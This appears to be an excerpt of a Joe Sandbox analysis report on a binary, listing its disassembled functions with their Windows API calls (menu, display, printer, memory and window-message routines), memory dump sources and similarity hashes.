Instruction ID: 6c5eda7c54b54bda36db4d94695a59bca7cccf7fd6c7c4b03fd2d7d26779f04d
Opcode Fuzzy Hash: 64f853e5cdbd48df68d9df54b1c2b40db4d5987dc709f241c0db509be15127ff
Instruction Fuzzy Hash: CE21A17591420CABDB10AB64ECC9FFD776CAB54750F80006AFA85D60C0EF7099848F64

Function 001CA380 Relevance: 12.1, APIs: 8, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 001CA392
GetMenuItemCount.USER32(?), ref: 001CA39A
GetSubMenu.USER32(?,-00000001), ref: 001CA3B7
GetMenuItemCount.USER32(00000000), ref: 001CA3C7
GetSubMenu.USER32(00000000,00000000), ref: 001CA3D8
RemoveMenu.USER32(00000000,00000000,00000400), ref: 001CA3F5
GetSubMenu.USER32(?,?), ref: 001CA40F
RemoveMenu.USER32(?,?,00000400), ref: 001CA42D

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$CountItem$Remove
String ID:
API String ID: 3494307843-0
Opcode ID: 558a701184b5df8f3121f9cd5c3d1dff380e1235cf407ae3c30229a9694e67b0
Instruction ID: 467e61255e5d0022d24187a13075d8f6b7d4708e658a6aabcc2a7f2f74838c02
Opcode Fuzzy Hash: 558a701184b5df8f3121f9cd5c3d1dff380e1235cf407ae3c30229a9694e67b0
Instruction Fuzzy Hash: DB216A3190020CFBCF029FA4DD88E9DBBB6FF24308FA4845AE501A6110C7B1EA51EF81

Function 001C93DC Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 001C93FB
lstrcmpW.KERNEL32(00000000,?), ref: 001C9408
OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 001C941A
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 001C943A
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 001C9442
GlobalLock.KERNEL32(00000000), ref: 001C944C
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 001C9459
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 001C9471

Part of subcall function 001D0E5F: GlobalFlags.KERNEL32(?), ref: 001D0E6E
Part of subcall function 001D0E5F: GlobalUnlock.KERNEL32(?), ref: 001D0E7F
Part of subcall function 001D0E5F: GlobalFree.KERNEL32(?), ref: 001D0E89

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 29ec6e43d9ff100f81b7f362ae5cca307484410f7ea7ef90d1741b654a4ba80b
Instruction ID: 8d0761ca89a36f5969a95489cf265b155f6d276fb654be1f91b9800cefc43431
Opcode Fuzzy Hash: 29ec6e43d9ff100f81b7f362ae5cca307484410f7ea7ef90d1741b654a4ba80b
Instruction Fuzzy Hash: 3C119171500604BADB226FA6CD89D6F7BFDEB84B40B00441EF645D6121DB31DD11DB60

Function 001CCD68 Relevance: 12.1, APIs: 8, Instructions: 64COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000031), ref: 001CCD7E
GetSystemMetrics.USER32(00000032), ref: 001CCD88
SetRectEmpty.USER32(003331EC), ref: 001CCD97
EnumDisplayMonitors.USER32(00000000,00000000,Function_0000CCE3,003331EC,?,?,0021D83D,?,?,?,001E72AE,?,?), ref: 001CCDA7
SystemParametersInfoW.USER32(00000030,00000000,003331EC,00000000), ref: 001CCDC2
SystemParametersInfoW.USER32(00001002,00000000,00333218,00000000), ref: 001CCDE2
SystemParametersInfoW.USER32(00001012,00000000,0033321C,00000000), ref: 001CCDFA
SystemParametersInfoW.USER32 ref: 001CCE1A

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: System$InfoParameters$Metrics$DisplayEmptyEnumMonitorsRect
String ID:
API String ID: 2614369430-0
Opcode ID: 685f2d9d31c1d439b72b1494900ef480a4822cec275dc7c50f16fe5332bbe2c8
Instruction ID: 5f3ff894ef2f157ceb2fc910e5e3444ac57cc0320746cb94f4e2e487d8745904
Opcode Fuzzy Hash: 685f2d9d31c1d439b72b1494900ef480a4822cec275dc7c50f16fe5332bbe2c8
Instruction Fuzzy Hash: E811C971541744AFE2319B669C89EE7BAFCEBDAB40F00091EE5AE86140D7B1A841CA61

Function 001CA5AE Relevance: 12.1, APIs: 8, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GlobalSize.KERNEL32(?), ref: 001CA5BF
GlobalAlloc.KERNEL32(00002002,00000000), ref: 001CA5D1
GlobalSize.KERNEL32(?), ref: 001CA5E2
GlobalLock.KERNEL32(?), ref: 001CA5F3
GlobalLock.KERNEL32(?), ref: 001CA5F9
GlobalSize.KERNEL32(?), ref: 001CA604
GlobalUnlock.KERNEL32(?), ref: 001CA617
GlobalUnlock.KERNEL32(?), ref: 001CA61C

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Global$Size$LockUnlock$Alloc
String ID:
API String ID: 2344174106-0
Opcode ID: 0818fb64ffe2b08cd042d7e7c71f291aac6dca5f32f786664041ed1023a6a91d
Instruction ID: 282fbfd674c75841e4f44bd00c00562acd6c1141be089495814a612d97fca573
Opcode Fuzzy Hash: 0818fb64ffe2b08cd042d7e7c71f291aac6dca5f32f786664041ed1023a6a91d
Instruction Fuzzy Hash: C301717190021CBFDB126F65DC88D5E7F6CEF542A47108069FD0997211DA70DE10DAA1

Function 001D51FD Relevance: 12.0, APIs: 8, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 001D520C
GetSystemMetrics.USER32(0000000C), ref: 001D5213
GetSystemMetrics.USER32(00000002), ref: 001D521A
GetSystemMetrics.USER32(00000003), ref: 001D5224
GetDC.USER32(00000000), ref: 001D522E
GetDeviceCaps.GDI32(00000000,00000058), ref: 001D523F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001D5247
ReleaseDC.USER32(00000000,00000000), ref: 001D524F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: c19f5d9740f3657cd9d28a6fb2842db3f997f6fe0418e573e41ecb85e3562d42
Instruction ID: 18e017d6ed2bef8a837a53e9e3c08bbde6ec8c08801e2796c14be8d569f7fc9d
Opcode Fuzzy Hash: c19f5d9740f3657cd9d28a6fb2842db3f997f6fe0418e573e41ecb85e3562d42
Instruction Fuzzy Hash: 4EF01DB1E80754BAE7105B72AC8DB267F68FB45761F104416E6499F280DAB598118FD0

Function 0024A81F Relevance: 10.8, APIs: 7, Instructions: 325windowstringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0024A829
GetMenuItemCount.USER32(0000000D), ref: 0024A872
GetMenuItemID.USER32(0000000D,?), ref: 0024A895

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Part of subcall function 0023ABE8: __EH_prolog3.LIBCMT ref: 0023ABEF

Part of subcall function 001CCC4D: __EH_prolog3.LIBCMT ref: 001CCC54

lstrlenW.KERNEL32(00000000,?), ref: 0024A9B7
CharUpperBuffW.USER32(00000002,00000001), ref: 0024A9CC
lstrlenW.KERNEL32(00000000), ref: 0024A9D4
GetSubMenu.USER32(00000000,?), ref: 0024AB06

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3Menu$Itemlstrlen$BuffCharCountException@8H_prolog3_ThrowUpper
String ID:
API String ID: 1336055891-0
Opcode ID: f04245fa5ef5c0c15993c386c0262ff634ac0bb20d1a89deac96a90c28ced9c3
Instruction ID: 3216721072c7daaf58d880656e9d28aa462f169edabe5c167d6c93e184ce3dec
Opcode Fuzzy Hash: f04245fa5ef5c0c15993c386c0262ff634ac0bb20d1a89deac96a90c28ced9c3
Instruction Fuzzy Hash: B4D18870914229EBCB29EB64CC95BEDB774AF25314F1042DAE11AA72D1DF309E90CF52

Function 001FEEE8 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 258keyboardCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(002F73F0), ref: 001FEF14
GetKeyState.USER32(00000011), ref: 001FEF1C
IsRectEmpty.USER32(?), ref: 001FEF79
GetWindowRect.USER32(?,002F73F0), ref: 001FF0F6

Strings

D2, xrefs: 001FF0B4
`2, xrefs: 001FEF39

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$StateWindow
String ID: D2$`2
API String ID: 2684165152-4068519015
Opcode ID: 4dc4dabd2ad7265e40da776f8ff70dca9c520a75608d850f0799872de411be66
Instruction ID: 40f2b88b527851a841212ff38cef6646f6400139376db689ee535c55ef707113
Opcode Fuzzy Hash: 4dc4dabd2ad7265e40da776f8ff70dca9c520a75608d850f0799872de411be66
Instruction Fuzzy Hash: 49913D31A042099FDF15DFA4D885BBEBBB6FF88310F148169FA05AB255DB709C41CBA0

Function 00250EDE Relevance: 10.7, APIs: 7, Instructions: 242COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00250EE5
CreateCompatibleDC.GDI32(00000002), ref: 00250F42

Part of subcall function 00233605: FillRect.USER32(?,00000020), ref: 00233619

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CompatibleCreateFillH_prolog3Rect
String ID:
API String ID: 2215992850-0
Opcode ID: 4d54b7d7281f46f460d9b00ce22413ee5e28fd383145dda8c98bbc766d4d54db
Instruction ID: 9cb77115acc2dfafdab20e97b4c67a79eaef266f0e5ab59333d81e16398e85d3
Opcode Fuzzy Hash: 4d54b7d7281f46f460d9b00ce22413ee5e28fd383145dda8c98bbc766d4d54db
Instruction Fuzzy Hash: F091CE30A2021ADFCB14DFA8CD85AEEBBB4FF44301F004269F955E6291DB70D969CB64

Function 001C37B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

_fgetc.LIBCMT ref: 001C383F
_fgetc.LIBCMT ref: 001C386C
_memcpy_s.LIBCMT ref: 001C3967

Strings

string too long, xrefs: 001C39C7

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: _fgetc$_memcpy_s
String ID: string too long
API String ID: 160369518-2556327735
Opcode ID: 0747a4f8c13984996dce05856d3dc4bf5914f89b69cbcc9bb9b1384ede410ef2
Instruction ID: c748f7077203540f6f65666a7bc7b3124cfe5a556de4cf6620949e7d8a791472
Opcode Fuzzy Hash: 0747a4f8c13984996dce05856d3dc4bf5914f89b69cbcc9bb9b1384ede410ef2
Instruction Fuzzy Hash: 63918E71E002199FCB18CBA8C881EEEB7B5FF28314F50861DE522A7681D771EA14CF90

Function 00215FEB Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00215FF2
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00216039
GetWindow.USER32(00000000,00000005), ref: 00216060
GetWindow.USER32(?,00000002), ref: 0021608B
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 002160BA

Strings

83/, xrefs: 00216181, 002161AD, 002161E8, 00216205

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSendWindow$H_prolog3
String ID: 83/
API String ID: 1382076901-2323854675
Opcode ID: 641a621be6a6623750593862099542a5eb1e9d7b4c5943c1e21a109cfc70abde
Instruction ID: 581643d6c80be3080a3ca21910ffe5b9dd36c0b03a0f830e76710aaf494915cc
Opcode Fuzzy Hash: 641a621be6a6623750593862099542a5eb1e9d7b4c5943c1e21a109cfc70abde
Instruction Fuzzy Hash: F571D335620215AFCB259F64C889FEDB7E5BF28750F254069F8099B392DB70DDA0CB90

Function 0021701A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 216windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00217071
IsWindow.USER32(?), ref: 00217238
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00217264
GetParent.USER32(?), ref: 0021726D
RedrawWindow.USER32(?,00000000,00000000,00000185,00000000), ref: 00217283

Strings

83/, xrefs: 0021713E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSendWindow$ParentRedraw
String ID: 83/
API String ID: 3493001960-2323854675
Opcode ID: e0447b1cf9424dbc6cbb99a89a849fb2a554b866ed2d933fae48149d6856171a
Instruction ID: 2c924e9ec28a9e570a3d768c2c8ffb80290026c1c855934406ecf248c0ca84a8
Opcode Fuzzy Hash: e0447b1cf9424dbc6cbb99a89a849fb2a554b866ed2d933fae48149d6856171a
Instruction Fuzzy Hash: E1718B34714202AFDB259F64C889AEEBBF5BF68300F144579F94ADB291DB309D91CB90

Function 001E4218 Relevance: 10.7, APIs: 7, Instructions: 176windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001E4222

Part of subcall function 00214CC5: __EH_prolog3.LIBCMT ref: 00214CCC

GetMenuItemCount.USER32(?), ref: 001E428C
GetMenuItemID.USER32(?,?), ref: 001E42AF
GetMenuItemCount.USER32(?), ref: 001E42F2
GetMenuItemID.USER32(?,?), ref: 001E4326
SendMessageW.USER32(?,00000234,00000000,00000000), ref: 001E4398
GetMenuState.USER32(?,?,00000400), ref: 001E43F0

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Item$Count$H_prolog3H_prolog3_MessageSendState
String ID:
API String ID: 999183886-0
Opcode ID: 37d9d9dce299b6691b468098cbcbb53950e0cb09117e6812aa9410acaa93f82c
Instruction ID: fe90e00cf929431e94bfc11048ac8b86923a737d59377b915dd324e451e6b7b7
Opcode Fuzzy Hash: 37d9d9dce299b6691b468098cbcbb53950e0cb09117e6812aa9410acaa93f82c
Instruction Fuzzy Hash: 247146719006AA9BCF35EF65CC84BEDB7B5AF05314F1542EAE929A7291CB305E81CF40

Function 00218149 Relevance: 10.7, APIs: 7, Instructions: 174COMMON

Download Yara Rule

APIs

Part of subcall function 00215F25: __EH_prolog3_GS.LIBCMT ref: 00215F2C
Part of subcall function 00215F25: GetDesktopWindow.USER32 ref: 00215F3A
Part of subcall function 00215F25: SetRectEmpty.USER32(?), ref: 00215F71
Part of subcall function 00215F25: SetRectEmpty.USER32(?), ref: 00215F83
Part of subcall function 00215F25: CopyRect.USER32(?,?), ref: 00215F8E
Part of subcall function 00215F25: CopyRect.USER32(?,?), ref: 00215FAA

SetRectEmpty.USER32(?), ref: 00218185
ClientToScreen.USER32(?,?), ref: 002181AD
IsRectEmpty.USER32(?), ref: 002181D6
GetParent.USER32(?), ref: 002181E3
GetCursorPos.USER32(?), ref: 00218208
IsRectEmpty.USER32(?), ref: 002182BE
EqualRect.USER32(?,?), ref: 002182D0

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$Copy$ClientCursorDesktopEqualH_prolog3_ParentScreenWindow
String ID:
API String ID: 1345960709-0
Opcode ID: ea17d111476a64089f4b9871d189b44515e4f78ab770647709e2edacd2aa650e
Instruction ID: 7831b055304564a120a5ba33bf489268ea98a0cf829157437a9b8805b9d3fc66
Opcode Fuzzy Hash: ea17d111476a64089f4b9871d189b44515e4f78ab770647709e2edacd2aa650e
Instruction Fuzzy Hash: 09515C71E10519AFCF05DFA4D8889EEBBBAEF58710F24416AF815FB240CB719D548BA0

Function 0021D990 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 170COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0021DA56
GetSysColorBrush.USER32(0000000F), ref: 0021DABF
SetClassLongW.USER32(?,000000F6,00000000), ref: 0021DACB
GetWindowRect.USER32(?,?), ref: 0021DAEE

Strings

LA/, xrefs: 0021D9C5, 0021DB62
2, xrefs: 0021D9E3

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: BrushClassColorLongRectWindow_memset
String ID: LA/$2
API String ID: 2638262843-3378029897
Opcode ID: f15e996ddfbe5fa171c6c188f96ed7121e657660cf0076721b15201ba5e2e2cf
Instruction ID: d75ab95cda22e523186b3ee3329a80add36f7ee5098e4572c7f6e29fa78fc70e
Opcode Fuzzy Hash: f15e996ddfbe5fa171c6c188f96ed7121e657660cf0076721b15201ba5e2e2cf
Instruction Fuzzy Hash: 7A6116B1A14209DFCF10DFA9C885BEEBBF9BF58340F10442AE91AE7251DB749951CB60

Function 001F94BC Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 161keyboardCOMMON

Download Yara Rule

APIs

ReleaseCapture.USER32 ref: 001F9545
GetKeyState.USER32(00000011), ref: 001F957E
GetCursorPos.USER32(?), ref: 001F95ED

Strings

2, xrefs: 001F956A
D2, xrefs: 001F9611
2, xrefs: 001F96B0

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

